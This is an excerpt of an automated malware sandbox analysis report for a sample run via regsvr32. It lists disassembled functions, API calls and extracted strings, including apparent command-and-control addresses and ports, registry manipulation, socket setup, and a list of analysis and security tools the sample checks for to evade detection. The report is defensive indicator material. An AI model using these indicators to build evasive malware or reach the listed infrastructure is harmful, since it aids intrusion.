Instruction ID: 89367f814ef0249239a0b0094ee9b6c769cab5d2a9f62699bfdbce377b560112
Opcode Fuzzy Hash: 3d0b285a1c183d9ed15233d5e90f35ef3308b6f5fd0085757d0cf32db775e372
Instruction Fuzzy Hash: 9722D577B785504BD71CCB19E892FA977A2F394308749A52CEA17D3F44DA3DEA06CA00

Function 02886C50 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
Instruction ID: 3600def51ed1a511deae8e1123363af5f8c6b0f1bf28b8f31be36afdbc53f823
Opcode Fuzzy Hash: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
Instruction Fuzzy Hash: 6171E93C7642558BCB0C9E1DD88123477D9EB8670A764E17DDADBCB207FA30E4438588

Function 028C735D Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
Instruction ID: b6c5f4c7d1f3339cc820ed230cc9ed1e8568981b760ee445d97486d6321f95d0
Opcode Fuzzy Hash: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
Instruction Fuzzy Hash: C771A83CB646454BCB0C8E1DD892234B7D9EB8670A774E17DDADBCB246DA30D8438D89

Function 02E6C804 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
Instruction ID: 2817e87cb2c81d6078075030d33074220a3110ebe3c9318ed878e3e4f82326e4
Opcode Fuzzy Hash: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
Instruction Fuzzy Hash: FD51C373B956A18BD7288F19E41CF6C3AA9F794389B61F03ADB5297F00D776D8508B00

Function 02880A90 Relevance: 107.8, APIs: 86, Instructions: 270COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 02880AA5

Part of subcall function 02879030: _errno.LIBCMT ref: 02879050

free.LIBCMT ref: 02880AAE
free.LIBCMT ref: 02880AB7
free.LIBCMT ref: 02880AC0
free.LIBCMT ref: 02880AC9
free.LIBCMT ref: 02880AD2
free.LIBCMT ref: 02880ADA
free.LIBCMT ref: 02880AE3
free.LIBCMT ref: 02880AEC
free.LIBCMT ref: 02880AF5
free.LIBCMT ref: 02880AFE
free.LIBCMT ref: 02880B07
free.LIBCMT ref: 02880B10
free.LIBCMT ref: 02880B19
free.LIBCMT ref: 02880B22
free.LIBCMT ref: 02880B2B
free.LIBCMT ref: 02880B37
free.LIBCMT ref: 02880B43
free.LIBCMT ref: 02880B4F
free.LIBCMT ref: 02880B5B
free.LIBCMT ref: 02880B67
free.LIBCMT ref: 02880B73
free.LIBCMT ref: 02880B7F
free.LIBCMT ref: 02880B8B
free.LIBCMT ref: 02880B97
free.LIBCMT ref: 02880BA3
free.LIBCMT ref: 02880BAF
free.LIBCMT ref: 02880BBB
free.LIBCMT ref: 02880BC7
free.LIBCMT ref: 02880BD3
free.LIBCMT ref: 02880BDF
free.LIBCMT ref: 02880BEB
free.LIBCMT ref: 02880BF7
free.LIBCMT ref: 02880C03
free.LIBCMT ref: 02880C0F
free.LIBCMT ref: 02880C1B
free.LIBCMT ref: 02880C27
free.LIBCMT ref: 02880C33
free.LIBCMT ref: 02880C3F
free.LIBCMT ref: 02880C4B
free.LIBCMT ref: 02880C57
free.LIBCMT ref: 02880C63
free.LIBCMT ref: 02880C6F
free.LIBCMT ref: 02880C7B
free.LIBCMT ref: 02880C87
free.LIBCMT ref: 02880C93
free.LIBCMT ref: 02880C9F
free.LIBCMT ref: 02880CAB
free.LIBCMT ref: 02880CB7
free.LIBCMT ref: 02880CC3
free.LIBCMT ref: 02880CCF
free.LIBCMT ref: 02880CDB
free.LIBCMT ref: 02880CE7
free.LIBCMT ref: 02880CF3
free.LIBCMT ref: 02880CFF
free.LIBCMT ref: 02880D0B
free.LIBCMT ref: 02880D17
free.LIBCMT ref: 02880D23
free.LIBCMT ref: 02880D2F
free.LIBCMT ref: 02880D3B
free.LIBCMT ref: 02880D47
free.LIBCMT ref: 02880D53
free.LIBCMT ref: 02880D5F
free.LIBCMT ref: 02880D6B
free.LIBCMT ref: 02880D77
free.LIBCMT ref: 02880D83
free.LIBCMT ref: 02880D8F
free.LIBCMT ref: 02880D9B
free.LIBCMT ref: 02880DA7
free.LIBCMT ref: 02880DB3
free.LIBCMT ref: 02880DBF
free.LIBCMT ref: 02880DCB
free.LIBCMT ref: 02880DD7
free.LIBCMT ref: 02880DE3
free.LIBCMT ref: 02880DEF
free.LIBCMT ref: 02880DFB
free.LIBCMT ref: 02880E07
free.LIBCMT ref: 02880E13
free.LIBCMT ref: 02880E1F
free.LIBCMT ref: 02880E2B
free.LIBCMT ref: 02880E37
free.LIBCMT ref: 02880E43
free.LIBCMT ref: 02880E4F
free.LIBCMT ref: 02880E5B
free.LIBCMT ref: 02880E67
free.LIBCMT ref: 02880E73

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: free$_errno
String ID:
API String ID: 2288870239-0
Opcode ID: 60a7ffa4d2c1c72e481c1fc4b58fd09ff59adc118a18aaad8529e092a6129a8d
Instruction ID: 1189b3482ae2aff0f5748847110999d856e3dea4ca5fb5ebcf464300ef642ef1
Opcode Fuzzy Hash: 60a7ffa4d2c1c72e481c1fc4b58fd09ff59adc118a18aaad8529e092a6129a8d
Instruction Fuzzy Hash: 4AA163382329898FD68DEB2DC8D4BA973B3BF48344F9441B9C84DCA1A6CE119C45CB52

Function 02E64D4C Relevance: 107.7, APIs: 86, Instructions: 180COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 02E64D61

Part of subcall function 02E55280: HeapFree.KERNEL32 ref: 02E55296
Part of subcall function 02E55280: _errno.LIBCMT ref: 02E552A0
Part of subcall function 02E55280: GetLastError.KERNEL32 ref: 02E552A8

free.LIBCMT ref: 02E64D6A
free.LIBCMT ref: 02E64D73
free.LIBCMT ref: 02E64D7C
free.LIBCMT ref: 02E64D85
free.LIBCMT ref: 02E64D8E
free.LIBCMT ref: 02E64D96
free.LIBCMT ref: 02E64D9F
free.LIBCMT ref: 02E64DA8
free.LIBCMT ref: 02E64DB1
free.LIBCMT ref: 02E64DBA
free.LIBCMT ref: 02E64DC3
free.LIBCMT ref: 02E64DCC
free.LIBCMT ref: 02E64DD5
free.LIBCMT ref: 02E64DDE
free.LIBCMT ref: 02E64DE7
free.LIBCMT ref: 02E64DF3
free.LIBCMT ref: 02E64DFF
free.LIBCMT ref: 02E64E0B
free.LIBCMT ref: 02E64E17
free.LIBCMT ref: 02E64E23
free.LIBCMT ref: 02E64E2F
free.LIBCMT ref: 02E64E3B
free.LIBCMT ref: 02E64E47
free.LIBCMT ref: 02E64E53
free.LIBCMT ref: 02E64E5F
free.LIBCMT ref: 02E64E6B
free.LIBCMT ref: 02E64E77
free.LIBCMT ref: 02E64E83
free.LIBCMT ref: 02E64E8F
free.LIBCMT ref: 02E64E9B
free.LIBCMT ref: 02E64EA7
free.LIBCMT ref: 02E64EB3
free.LIBCMT ref: 02E64EBF
free.LIBCMT ref: 02E64ECB
free.LIBCMT ref: 02E64ED7
free.LIBCMT ref: 02E64EE3
free.LIBCMT ref: 02E64EEF
free.LIBCMT ref: 02E64EFB
free.LIBCMT ref: 02E64F07
free.LIBCMT ref: 02E64F13
free.LIBCMT ref: 02E64F1F
free.LIBCMT ref: 02E64F2B
free.LIBCMT ref: 02E64F37
free.LIBCMT ref: 02E64F43
free.LIBCMT ref: 02E64F4F
free.LIBCMT ref: 02E64F5B
free.LIBCMT ref: 02E64F67
free.LIBCMT ref: 02E64F73
free.LIBCMT ref: 02E64F7F
free.LIBCMT ref: 02E64F8B
free.LIBCMT ref: 02E64F97
free.LIBCMT ref: 02E64FA3
free.LIBCMT ref: 02E64FAF
free.LIBCMT ref: 02E64FBB
free.LIBCMT ref: 02E64FC7
free.LIBCMT ref: 02E64FD3
free.LIBCMT ref: 02E64FDF
free.LIBCMT ref: 02E64FEB
free.LIBCMT ref: 02E64FF7
free.LIBCMT ref: 02E65003
free.LIBCMT ref: 02E6500F
free.LIBCMT ref: 02E6501B
free.LIBCMT ref: 02E65027
free.LIBCMT ref: 02E65033
free.LIBCMT ref: 02E6503F
free.LIBCMT ref: 02E6504B
free.LIBCMT ref: 02E65057
free.LIBCMT ref: 02E65063
free.LIBCMT ref: 02E6506F
free.LIBCMT ref: 02E6507B
free.LIBCMT ref: 02E65087
free.LIBCMT ref: 02E65093
free.LIBCMT ref: 02E6509F
free.LIBCMT ref: 02E650AB
free.LIBCMT ref: 02E650B7
free.LIBCMT ref: 02E650C3
free.LIBCMT ref: 02E650CF
free.LIBCMT ref: 02E650DB
free.LIBCMT ref: 02E650E7
free.LIBCMT ref: 02E650F3
free.LIBCMT ref: 02E650FF
free.LIBCMT ref: 02E6510B
free.LIBCMT ref: 02E65117
free.LIBCMT ref: 02E65123
free.LIBCMT ref: 02E6512F

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: 0020f19ff185dbff27dcfb762236250369b3a71a9d3eaf30a14737fe5e34001e
Instruction ID: 8eb7fc7054d4d90456461afed901519586ab085b1d75a4dbb178e86664503c21
Opcode Fuzzy Hash: 0020f19ff185dbff27dcfb762236250369b3a71a9d3eaf30a14737fe5e34001e
Instruction Fuzzy Hash: 2781662A2B265489DB85FFF1C8A42AD2332EBD4F44FC4A132EE4D5F525CE11D84587D2

Function 02E4E1F7 Relevance: 49.3, APIs: 12, Strings: 16, Instructions: 280stringregistrysleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02E55378: malloc.LIBCMT ref: 02E55392

RegOpenKeyExW.ADVAPI32 ref: 02E4E232
RegDeleteValueW.ADVAPI32 ref: 02E4E243
RegSetValueExW.ADVAPI32 ref: 02E4E26E
RegCloseKey.ADVAPI32 ref: 02E4E2D4
lstrlenW.KERNEL32 ref: 02E4E367
lstrlenW.KERNEL32 ref: 02E4E377
lstrlenW.KERNEL32 ref: 02E4E45D
lstrlenW.KERNEL32 ref: 02E4E46D

Part of subcall function 02E55378: _callnewh.LIBCMT ref: 02E55386
Part of subcall function 02E55378: std::exception::exception.LIBCMT ref: 02E553FF

Part of subcall function 02E55560: _errno.LIBCMT ref: 02E5557F
Part of subcall function 02E55560: _invalid_parameter_noinfo.LIBCMT ref: 02E5558B

lstrlenW.KERNEL32 ref: 02E4E54D
lstrlenW.KERNEL32 ref: 02E4E55D
RegCloseKey.ADVAPI32 ref: 02E4E60C
Sleep.KERNEL32 ref: 02E4E617

Strings

127.0.0.1, xrefs: 02E4E518
Console, xrefs: 02E4E216
p3:, xrefs: 02E4E51F
o3:, xrefs: 02E4E538
p1:, xrefs: 02E4E339
o2:, xrefs: 02E4E448
IpDate, xrefs: 02E4E23C, 02E4E259
8888, xrefs: 02E4E441
o1:, xrefs: 02E4E352
p2:, xrefs: 02E4E42F
6666, xrefs: 02E4E34B
t3:, xrefs: 02E4E553, 02E4E58F
23.235.165.54, xrefs: 02E4E428
23.235.165.54, xrefs: 02E4E332
t2:, xrefs: 02E4E463, 02E4E49F
t1:, xrefs: 02E4E36D, 02E4E3AF

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: lstrlen$CloseValue$DeleteOpenSleep_callnewh_errno_invalid_parameter_noinfomallocstd::exception::exception
String ID: 127.0.0.1$23.235.165.54$23.235.165.54$6666$8888$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
API String ID: 2396878867-820654812
Opcode ID: 0ba1c50f3f6f8bd47f20042370db24bb557a2b144f417de9e289bd57393602ee
Instruction ID: 91aac7dc9375485220195e3e108f217f866fdca93596b97f7ad64732f1647a62
Opcode Fuzzy Hash: 0ba1c50f3f6f8bd47f20042370db24bb557a2b144f417de9e289bd57393602ee
Instruction Fuzzy Hash: 35B1DC71795A9581EB14AF25F9487AC2762F748BC9F88E016DE0E17B54EF78C18AC340

Function 02E66894 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 02E668D9
GetProcAddress.KERNEL32 ref: 02E668F5
EncodePointer.KERNEL32 ref: 02E66907
GetProcAddress.KERNEL32 ref: 02E6691E
EncodePointer.KERNEL32 ref: 02E66927
GetProcAddress.KERNEL32 ref: 02E6693E
EncodePointer.KERNEL32 ref: 02E66947
GetProcAddress.KERNEL32 ref: 02E6695E
EncodePointer.KERNEL32 ref: 02E66967
GetProcAddress.KERNEL32 ref: 02E66986
EncodePointer.KERNEL32 ref: 02E6698F
DecodePointer.KERNEL32 ref: 02E669C2
DecodePointer.KERNEL32 ref: 02E669D2
DecodePointer.KERNEL32 ref: 02E66A28
DecodePointer.KERNEL32 ref: 02E66A49
DecodePointer.KERNEL32 ref: 02E66A63

Strings

GetProcessWindowStation, xrefs: 02E6697C
USER32.DLL, xrefs: 02E668D2
GetActiveWindow, xrefs: 02E6690D
GetUserObjectInformationW, xrefs: 02E6694D
MessageBoxW, xrefs: 02E668EB
GetLastActivePopup, xrefs: 02E6692D

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
API String ID: 2643518689-564504941
Opcode ID: 9b477d339a0cbf5d1fb3b709f53cc0189430c5bdffb326d61e63b17971d6259a
Instruction ID: a8e0c5379143483e8b475a938cf6cedfbfadcd9f8923a8caf7ed725d030724a4
Opcode Fuzzy Hash: 9b477d339a0cbf5d1fb3b709f53cc0189430c5bdffb326d61e63b17971d6259a
Instruction Fuzzy Hash: E35107242D6B9181EE25DB52F81C36473A4AB49FE9F89A029CC5F47B24EF3EC5858310

Function 02E67754 Relevance: 32.0, APIs: 21, Instructions: 482COMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 02E67785
_errno.LIBCMT ref: 02E6778E
__doserrno.LIBCMT ref: 02E677E8
_errno.LIBCMT ref: 02E677EF
_invalid_parameter_noinfo.LIBCMT ref: 02E67E5E

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: __doserrno_errno$_invalid_parameter_noinfo
String ID:
API String ID: 2315031519-0
Opcode ID: 83821fb44c2082aa68f38fc84eff16adcc4682b38c585996f4bedfbd64328b7c
Instruction ID: ac06c1e682b1ec285dd5cf99185a312c21ea1fb09ba98948c648f00eacc09e56
Opcode Fuzzy Hash: 83821fb44c2082aa68f38fc84eff16adcc4682b38c585996f4bedfbd64328b7c
Instruction Fuzzy Hash: 261257622D46C086DB129F68D8883BCBBA2F746BDCF98F605CE6A077A1D779C445C701

Function 02E59714 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 334COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02E57488: RtlLookupFunctionEntry.KERNEL32 ref: 02E574FC

__GetUnwindTryBlock.LIBCMT ref: 02E59778
__SetUnwindTryBlock.LIBCMT ref: 02E5979F

Part of subcall function 02E5733C: RaiseException.KERNEL32 ref: 02E573B7

__GetUnwindTryBlock.LIBCMT ref: 02E597A9
_getptd.LIBCMT ref: 02E597FF
_getptd.LIBCMT ref: 02E59812
_getptd.LIBCMT ref: 02E5981E
_SetThrowImageBase.LIBCMT ref: 02E59832
_getptd.LIBCMT ref: 02E59882
_getptd.LIBCMT ref: 02E59895
_getptd.LIBCMT ref: 02E598A1
type_info::operator==.LIBCMT ref: 02E59908
std::exception::exception.LIBCMT ref: 02E59941
_getptd.LIBCMT ref: 02E59B74
std::exception::exception.LIBCMT ref: 02E59BED

Strings

bad exception, xrefs: 02E5992E
csm, xrefs: 02E597BF
csm, xrefs: 02E59966
csm, xrefs: 02E5984D

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _getptd$BlockUnwind$std::exception::exception$BaseEntryExceptionFunctionImageLookupRaiseThrowtype_info::operator==
String ID: bad exception$csm$csm$csm
API String ID: 1639654010-820278400
Opcode ID: d9cf7963ac656a204547f84c84e07c0a39f698d544cc56fb1fb8ee67f789732f
Instruction ID: ecbd2d2c0a466536a0e618c3cb8b0df6cf19f7b6dc165c817d1787ce43f7158b
Opcode Fuzzy Hash: d9cf7963ac656a204547f84c84e07c0a39f698d544cc56fb1fb8ee67f789732f
Instruction Fuzzy Hash: 8AD1D0326A0A60CADF24EF66D4443EE77A2F744B8CF44A225EF4917B05CB38C151CB95

Function 02883C88 Relevance: 30.2, APIs: 14, Strings: 3, Instructions: 493COMMONLIBRARYCODE

Download Yara Rule

APIs

__GetUnwindTryBlock.LIBCMT ref: 02883CEC
__SetUnwindTryBlock.LIBCMT ref: 02883D13
__GetUnwindTryBlock.LIBCMT ref: 02883D1D
_getptd.LIBCMT ref: 02883D73
_getptd.LIBCMT ref: 02883D86
_getptd.LIBCMT ref: 02883D92
_SetThrowImageBase.LIBCMT ref: 02883DA6
_getptd.LIBCMT ref: 02883DF6
_getptd.LIBCMT ref: 02883E09
_getptd.LIBCMT ref: 02883E15
type_info::operator==.LIBCMT ref: 02883E7C
std::exception::exception.LIBCMT ref: 02883EB5
_getptd.LIBCMT ref: 028840E8
std::exception::exception.LIBCMT ref: 02884161

Strings

csm, xrefs: 02883DC1
csm, xrefs: 02883EDA
csm, xrefs: 02883D33

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _getptd$BlockUnwind$std::exception::exception$BaseImageThrowtype_info::operator==
String ID: csm$csm$csm
API String ID: 3798665358-393685449
Opcode ID: 2c9889e119e4c0264914e1b215a30e701807c66576accc05f7666389a9f8a482
Instruction ID: 969f05b4620ff1035ba6b5843e1372401e4a491df2a815a003867405dc124424
Opcode Fuzzy Hash: 2c9889e119e4c0264914e1b215a30e701807c66576accc05f7666389a9f8a482
Instruction Fuzzy Hash: 84E1D33D618A098FCB68BF6CD4456A9B3E2FB54705F4002AED84AD3651DB34E952CB83

Function 028C4395 Relevance: 30.2, APIs: 14, Strings: 3, Instructions: 493COMMONLIBRARYCODE

Download Yara Rule

APIs

__GetUnwindTryBlock.LIBCMT ref: 028C43F9
__SetUnwindTryBlock.LIBCMT ref: 028C4420
__GetUnwindTryBlock.LIBCMT ref: 028C442A
_getptd.LIBCMT ref: 028C4480
_getptd.LIBCMT ref: 028C4493
_getptd.LIBCMT ref: 028C449F
_SetThrowImageBase.LIBCMT ref: 028C44B3
_getptd.LIBCMT ref: 028C4503
_getptd.LIBCMT ref: 028C4516
_getptd.LIBCMT ref: 028C4522
type_info::operator==.LIBCMT ref: 028C4589
std::exception::exception.LIBCMT ref: 028C45C2
_getptd.LIBCMT ref: 028C47F5
std::exception::exception.LIBCMT ref: 028C486E

Strings

csm, xrefs: 028C4440
csm, xrefs: 028C45E7
csm, xrefs: 028C44CE

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: _getptd$BlockUnwind$std::exception::exception$BaseImageThrowtype_info::operator==
String ID: csm$csm$csm
API String ID: 3798665358-393685449
Opcode ID: 18458f1114e23ce66089f8be90dc31260b8c4abc6b9c0a44086fbee8cbe3dec9
Instruction ID: 5b60404b6ecee807e08f39fe0e1dfcf40492830bcf5fbf9f917e2dbd4113c7e0
Opcode Fuzzy Hash: 18458f1114e23ce66089f8be90dc31260b8c4abc6b9c0a44086fbee8cbe3dec9
Instruction Fuzzy Hash: D9E1E33C618A0D8FDB28EF6CC4656A973E2FF58315F64422ED84AD3655DB34E481CB82

Function 02E4D520 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 224stringsleepregistryCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02E4D568
wsprintfW.USER32 ref: 02E4D5B0

Part of subcall function 02E49830: lstrlenW.KERNEL32 ref: 02E49862
Part of subcall function 02E49830: lstrlenW.KERNEL32 ref: 02E4987C
Part of subcall function 02E49830: lstrlenW.KERNEL32 ref: 02E49888

lstrlenW.KERNEL32 ref: 02E4D61B
lstrlenW.KERNEL32 ref: 02E4D62E
CreateEventA.KERNEL32 ref: 02E4D79E
RegOpenKeyExW.ADVAPI32 ref: 02E4D808
CloseHandle.KERNEL32 ref: 02E4D850
Sleep.KERNEL32 ref: 02E4D86E
CloseHandle.KERNEL32 ref: 02E4D897
CloseHandle.KERNEL32 ref: 02E4D8B6

Strings

%4d.%2d.%2d-%2d:%2d:%2d, xrefs: 02E4D5A2
o1:, xrefs: 02E4D609
Console\1, xrefs: 02E4D7FA
p1:, xrefs: 02E4D5F0
t1:, xrefs: 02E4D624

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: lstrlen$CloseHandle$CreateEventLocalOpenSleepTimewsprintf
String ID: %4d.%2d.%2d-%2d:%2d:%2d$Console\1$o1:$p1:$t1:
API String ID: 441366266-1614091359
Opcode ID: 2c5e8d8077fca6d9efecd33f24c60deca68b6aa5d3bb0323bb46866befe63c5a
Instruction ID: f9180e803768761bbb4b3d9e8b66af3d0e53e1c0929281022cc6f6547565cdba
Opcode Fuzzy Hash: 2c5e8d8077fca6d9efecd33f24c60deca68b6aa5d3bb0323bb46866befe63c5a
Instruction Fuzzy Hash: 03919E72294B81C6DB209F26F9487AE77B5F785B88F40A115EA8E47B58DF38C245CB40

Function 02E46FF0 Relevance: 24.6, APIs: 2, Strings: 12, Instructions: 146windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 02E47012

Strings

Sniff, xrefs: 02E471B6
TaskExplorer, xrefs: 02E470B2
ApateDNS, xrefs: 02E4706A
Metascan, xrefs: 02E470FA
Capsa, xrefs: 02E471A2, 02E471CA
Malwarebytes, xrefs: 02E47082
TCPEye, xrefs: 02E4709A
Fiddler, xrefs: 02E47172
Process, xrefs: 02E471DE
Wireshark, xrefs: 02E47112
Port, xrefs: 02E470E2
CurrPorts, xrefs: 02E470CA

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: VisibleWindow
String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
API String ID: 1208467747-3439171801
Opcode ID: 9b8c77d6ced09ec049599edcb5e11aaf6237f5b26d3217c734fc7b2da4660954
Instruction ID: a3860d71bc2986625d7b96e004509505f61254d521b2f0eea2fcbf0fe17a48b0
Opcode Fuzzy Hash: 9b8c77d6ced09ec049599edcb5e11aaf6237f5b26d3217c734fc7b2da4660954
Instruction Fuzzy Hash: 49516DA03D679281EE5AEB2BF98832453629F49798F88F475AC0E1B358EF3CD4408744

Function 02E50EB0 Relevance: 24.3, APIs: 16, Instructions: 279COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 02E50ED2
SetLastError.KERNEL32 ref: 02E50EF5

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 77dedc7f358742ff0399e8efbd8c3910799c15a7c59c220d042ca75b07eb62eb
Instruction ID: 84e41e8c66fdc51c38ec72c00c6faab1963ab79b66e46a657e96838f391d6a8a
Opcode Fuzzy Hash: 77dedc7f358742ff0399e8efbd8c3910799c15a7c59c220d042ca75b07eb62eb
Instruction Fuzzy Hash: 7DB1C136361AA08ADF14CF26EA547A933A5FB48BC8F44A529DE0E4BF44EF38D455C710

Function 02E441C0 Relevance: 21.1, APIs: 14, Instructions: 127networkstringCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 02E441FB
WSAIoctl.WS2_32 ref: 02E44250
setsockopt.WS2_32 ref: 02E44272
setsockopt.WS2_32 ref: 02E44294
WSACreateEvent.WS2_32 ref: 02E4429A
lstrlenW.KERNEL32 ref: 02E442A7
WideCharToMultiByte.KERNEL32 ref: 02E442CA
lstrlenW.KERNEL32 ref: 02E442E4
WideCharToMultiByte.KERNEL32 ref: 02E44307
gethostbyname.WS2_32 ref: 02E44314

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiWidelstrlensetsockopt$CreateEventIoctlgethostbynamesocket
String ID:
API String ID: 2536029566-0
Opcode ID: cf50b05f241690f5b75512f02c6d7ffb42373bcd321a6766e23d8fdfdd69b64a
Instruction ID: eaea14d51cd29cd340170f01da4e2c026366dcab255eb6bece59f399d000c43f
Opcode Fuzzy Hash: cf50b05f241690f5b75512f02c6d7ffb42373bcd321a6766e23d8fdfdd69b64a
Instruction Fuzzy Hash: B6514F76258B9086E720CF65F44875AB7A5F788BE8F105215EE9A43FA8DF3CC045CB40

Function 02E5F128 Relevance: 19.6, APIs: 13, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

__free_lconv_mon.LIBCMT ref: 02E5F180

Part of subcall function 02E654AC: free.LIBCMT ref: 02E654CA
Part of subcall function 02E654AC: free.LIBCMT ref: 02E654DC
Part of subcall function 02E654AC: free.LIBCMT ref: 02E654EE
Part of subcall function 02E654AC: free.LIBCMT ref: 02E65500
Part of subcall function 02E654AC: free.LIBCMT ref: 02E65512
Part of subcall function 02E654AC: free.LIBCMT ref: 02E65524
Part of subcall function 02E654AC: free.LIBCMT ref: 02E65536
Part of subcall function 02E654AC: free.LIBCMT ref: 02E65548
Part of subcall function 02E654AC: free.LIBCMT ref: 02E6555A
Part of subcall function 02E654AC: free.LIBCMT ref: 02E6556C
